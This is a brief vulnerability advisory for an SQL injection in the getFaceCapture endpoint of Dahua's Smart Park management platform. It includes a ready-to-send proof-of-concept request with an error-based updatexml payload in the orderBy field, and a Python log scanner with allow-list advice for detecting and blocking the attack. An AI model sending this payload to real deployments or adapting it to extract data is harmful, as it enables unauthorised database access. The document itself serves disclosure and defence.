Dahua Smart Park Comprehensive Management Platform getFaceCapture SQL Injection Vulnerability
Vulnerability Description
The getFaceCapture interface of the Dahua Smart Park Comprehensive Management Platform has a SQL injection vulnerability. An attacker can use it to execute arbitrary SQL statements and obtain sensitive information from the database.
Vulnerability Impact
Smart Park Comprehensive Management Platform
Network surveying and mapping
Vulnerability Reproduction
PoC request
/portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20md5(123)),0x7e),1)--%22%7D/extend/%7B%7D
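A defender-side check for the request above, as an added example that is not part of the original post or of the vendor's code: it decodes the pageJson path segment from access-log lines and flags any orderBy value that is not a plain column reference. The log format, the capture_time column name, the /portal/index.html path and the allow-list pattern are assumptions made for illustration.

```python
import json
import re
from urllib.parse import unquote

# Endpoint layout taken from the request path in the advisory.
ENDPOINT = re.compile(r"/portal/services/carQuery/getFaceCapture/searchJson/.*?"
                      r"/pageJson/(?P<page>.*?)/extend/")
# Assumption: a legitimate orderBy is one column name or index, optionally ASC/DESC.
SAFE_ORDER_BY = re.compile(r"(?:[A-Za-z_][A-Za-z0-9_.]*|\d+)(?:\s+(?:asc|desc))?", re.I)
REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')  # request line in an access log


def classify(path):
    """Return 'not-endpoint', 'ok' or 'suspicious: <reason>' for one request path."""
    m = ENDPOINT.search(path)
    if not m:
        return "not-endpoint"
    try:
        page = json.loads(unquote(m.group("page")))
    except ValueError:
        return "suspicious: pageJson is not valid JSON"
    if not isinstance(page, dict):
        return "suspicious: pageJson is not an object"
    order_by = page.get("orderBy", "1")  # an absent orderBy is treated as harmless
    if not (isinstance(order_by, str) and SAFE_ORDER_BY.fullmatch(order_by.strip())):
        return "suspicious: orderBy is not a plain column reference"
    return "ok"


def scan(log_lines):
    """Return (line_number, verdict) for each log line whose request is suspicious."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        m = REQUEST.search(line)
        verdict = classify(m.group(1)) if m else "not-endpoint"
        if verdict.startswith("suspicious"):
            hits.append((n, verdict))
    return hits


BASE = "/portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/"
LOG_FMT = '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET {} HTTP/1.1" 200 512'
# Constructed log lines: a benign sort, the orderBy value from the advisory, another page.
SAMPLE_LOG = [
    LOG_FMT.format(BASE + "%7B%22orderBy%22:%22capture_time%20desc%22%7D/extend/%7B%7D"),
    LOG_FMT.format(BASE + "%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,"
                   "(select%20md5(123)),0x7e),1)--%22%7D/extend/%7B%7D"),
    LOG_FMT.format("/portal/index.html"),
]
```

The same allow-list idea applies on the server side: an orderBy value should be mapped to a fixed set of known column names before it reaches the SQL statement, since ORDER BY clauses cannot be bound as query parameters.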
This post is licensed under CC BY 4.0 by the author.